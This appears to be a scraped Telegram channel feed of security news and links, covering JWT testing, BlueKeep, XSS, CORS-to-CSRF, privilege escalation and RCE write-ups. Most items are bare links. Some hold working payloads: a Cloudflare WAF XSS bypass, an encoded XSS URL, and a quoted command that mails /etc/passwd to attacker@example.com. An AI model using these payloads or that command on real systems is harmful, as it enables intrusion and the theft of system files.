Information Security
@sec_nerd_en
415
subscribers
157
photos
5
videos
9
files
2.28K
links
Information Security News
we are
@sec_nerd
twin brother
Download Telegram
Join
Information Security
415 subscribers
Information Security
https://github.com/securing/IOSSecuritySuite
GitHub
GitHub - securing/IOSSecuritySuite: iOS platform security & anti-tampering Swift library
iOS platform security & anti-tampering Swift library - securing/IOSSecuritySuite
Information Security
Information Security
https://mazinahmed.net/blog/breaking-jwt/
https://github.com/mazen160/jwt-pwn
GitHub
GitHub - mazen160/jwt-pwn: Security Testing Scripts for JWT
Security Testing Scripts for JWT. Contribute to mazen160/jwt-pwn development by creating an account on GitHub.
Information Security
https://incogbyte.github.io/pathtraversal/
Information Security
https://thehackernews.com/2019/10/nginx-php-fpm-hacking.html
Information Security
https://www.twitch.tv/videos/500406087
Twitch
Solving CTFs from Burp Suite's Web Academy
nahamsec - Science & Technology - Twitch
Information Security
https://www.youtube.com/watch?v=yWUroCmeKgQ
YouTube
แฮกช่องโหว่ Windows ยิงแล้วทำให้เครื่องอื่นจอฟ้าดับไปได้ #Bluekeep (CVE-2019-0708)
ทดสอบเพื่อการศึกษาเท่านั้นอย่าเอาไปแฮกคนอื่นนะจ๊ะ https://www.exploit-db.com/exploits/46946 *แก้ไขจุดผิดในวีดีโอจากกระทบ Windows 2018 เป็น 2008
Information Security
https://www.boozallen.com/c/insight/blog/wrapping-up-the-shellcode-signature-series.html
Boozallen
Wrapping Up the Shellcode Signature Series
Our Shellcode Signatures Series provides tradecraft for cyber defenders to take as they protect their organizations from persistent, innovative attackers.
Information Security
https://medium.com/@mehulcodes/hello-hackers-17572db4476a
Medium
Response to
Hello Hackers,
Information Security
https://www.sec-1.com/blog/wp-content/uploads/2016/08/Hunting-postMessage-Vulnerabilities.pdf
Claranet UK
Sec-1 now fully incorporated into Claranet. How to find us.
Information Security
https://www.sec-1.com/blog/2016/hunting-html-5-postmessage-vulnerabilities
Sec-1 Labs
Hunting HTML 5 postMessage Vulnerabilities - Sec-1 Labs
Download Paper: Hunting postMessage Vulnerabilities Download Sample Code: sample code Sec-1 Ltd partnered with AppCheck.com to undertake a research project investigating the security challenges posed by next generation web applications. The project included…
Information Security
http://www.thegreycorner.com/2017/01/exploiting-difficult-sql-injection.html
Information Security
https://brutelogic.com.br/xss.php?a=%3Csvg%20onload=top.open%60javas%5Ccript:al%5Cert(1)%60%3E
Information Security
https://medium.com/@ronak_9889/privilege-escalation-using-api-endpoint-fce841caaff3
Medium
Privilege Escalation using Api endpoint
Hi All,
Information Security
Cloudflare XSS Bypass Payload
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare
#bugbounty
#bugbountytips
#WAF
#Xss
Information Security
https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441
Medium
CORS To CSRF Attack
This writeup is about the CORS Misconfiguration by which I was able to perform a CSRF attack to change other users account Info. The…
Information Security
https://0day.work/open-redirects-in-improperly-configured-mod_rewrite-rules-poc-for-cve-2019-10098/
Sebastian Neef - 0day.work
Open Redirects In Improperly Configured mod_rewrite Rules (PoC for CVE-2019-10098?)
I recently came across the following Apache vulnerability
[https://httpd.apache.org/security/vulnerabilities_24.html]: "mod_rewrite
potential open redirect (CVE-2019-10098)", but I couldn't find a proof of
concept, so I started playing around with possible…
Information Security
https://twitter.com/nixfreax/status/1189196160386371584
Twitter
nixfreax
pseudo shell via email: echo "message body: $(cat /etc/passwd)" | mail -s "loot" attacker@example.com #BugBounty https://t.co/CUDFAgX2EV
Information Security
https://blog.ripstech.com/2019/driveby-rce-exploit-pimcore/
RIPS Security Blog
Drive By RCE Exploit in Pimcore 6.2.0
Read More ›
Information Security
https://pentestmag.com/local-privilege-escalation-in-rapid7s-windows-insight-idr-agent/
Pentestmag
Local Privilege Escalation in Rapid7’s Windows Insight IDR Agent - Pentestmag
Local Privilege Escalation in Rapid7’s Windows Insight IDR Agent by Florian Bogner With Insight IDR Rapid7 has created a very powerful, yet …
Information Security
https://pentesttools.net/xsrfprobe-the-prime-cross-site-request-forgery-audit-and-exploitation-toolkit/